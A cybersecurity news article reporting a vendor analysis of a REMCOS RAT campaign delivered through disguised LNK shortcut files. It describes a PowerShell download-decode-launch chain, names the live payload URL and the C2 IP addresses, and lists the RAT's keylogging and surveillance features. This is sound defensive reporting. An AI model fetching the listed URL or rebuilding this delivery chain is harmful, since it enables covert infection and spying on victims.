Stealthy REMCOS Backdoor Delivered by LNK Files: Bypasses Antivirus with Multi-Stage PowerShell Attack

Cybercriminals continue to find clever ways to bypass antivirus solutions and endpoint defenses. A recent Point Wild analysis has shed light on a stealthy multi-stage malware campaign that leverages the deceptive simplicity of a Windows shortcut file—.lnk—to deploy the REMCOS backdoor, a powerful remote access trojan (RAT) known for full-system control capabilities.

“A common way hackers carry out fileless attacks is by using malicious Windows Shortcut (LNK) files. These shortcuts are disguised to look harmless, like a document, folder, or disk drive,” the report explains.

The attack begins with social engineering—typically a phishing email disguised as an invoice or document. Once the victim clicks the malicious LNK file, the damage unfolds in three silent stages:

1. Execution of PowerShell: The LNK invokes the Windows PowerShell Processor. This command quietly downloads a disguised file (HEW.GIF) from https://shipping-hr.ro/m/r/r.txt.
2. Base64 Decoding:
   The HEW.GIF file is a Base64-encoded payload, decoded using PowerShell into an executable: CHROME.PIF.
3. Payload Launch: “start C:\\ProgramData\\CHROME.PIF launches the malicious payload… which is a PE image-based MS-DOS program containing the REMCOS RAT.”

Unlike Office documents, LNK files do not prompt macro warnings, allowing the execution to occur without user suspicion.

REMCOS is a backdoor written in C++ that communicates via a custom TCP protocol. It enables:

• Remote shell command execution
• File upload/download
• Keystroke logging
• Webcam and microphone hijacking
• Screenshot capturing

The malware uses SetWindowsHookExA (from user32.dll) to intercept keystrokes and stores logs in %ProgramData%\remcos\logs.dat.

“A log file is stored in the %ProgramData% directory, where a folder named ‘remcos’ is created… to capture and store all system logging activities and keystrokes,” the report explains.

The malware establishes encrypted command-and-control (C2) communication with:

• 92.82.184.33 — Romania (Telekom Romania, AS9050)
• 198.23.251.10 — United States

The domain shipping-hr.ro resolves to the Romanian IP, delivering the malicious payload via TLS 1.2.

Organizations and users must maintain vigilance, especially with file types like .lnk, .pif, and hidden attachments in archives.

Related Posts:

• Remcos RAT: Hackers Target Ukrainian Government with Surveillance Tool
• Beware of Word: Remcos RAT Lurks in Malicious Documents
• Stealthy Remcos RAT Campaign Uses PowerShell to Evade Antivirus Detection
• Researcher Uncovers New Phishing Campaign Deploying Remcos RAT with Advanced Evasion Techniques
• LNK Files and SSH Commands: The New Arsenal of Advanced Cyber Attacks

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy